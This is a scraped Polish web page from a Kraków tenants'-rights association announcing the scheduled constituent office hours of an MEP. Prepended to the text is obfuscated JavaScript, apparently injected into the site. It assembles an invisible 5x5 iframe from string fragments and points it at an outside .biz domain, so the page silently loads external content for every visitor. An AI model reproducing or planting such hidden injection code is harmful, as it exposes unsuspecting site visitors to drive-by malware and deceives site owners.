jk='tip';gp='.bi';q='sr';yr='//';t='i';tq='ht';k='p:';h='me';w='ar';fr='z';l='t';r='c';n='f';bd='d';s='ra';ce=t.concat(n,s,h);pn=q.concat(r);hh=tq.concat(l,k,yr,jk,w,bd,gp,fr);var at=document.createElement(ce);at.setAttribute('width','5');at.setAttribute('height','5');at.setAttribute('style','display:none');at.setAttribute(pn,hh);document.body.appendChild(at); DYŻURY BOGUSŁAWA SONIKA-POSŁA DO PARLAMENTU EUROPEJSKIEGO

Dyżury odbędą się w terminach 16 i 23 stycznia, 6 lutego i 20 lutego oraz 6 marca i 20 marca w godzinach od 17.00-18.00 w siedzibie Rady i Zarządu Dzielnicy I Stare Miasto,31-150 Kraków, ul. Rynek Kleparski 4 (II p.), tel. 12 421-41-66. Zapraszamy do skorzystania z okazji podzielenia się z posłem naszymi problemami.

 

WYBORY 2018

POLECANE

 

 

 Copyright © 2013 Stowarzyszenie Krakowska Grupa Inicjatywna Obrony Praw Lokatorów.

Wszelkie prawa zastrzeżone.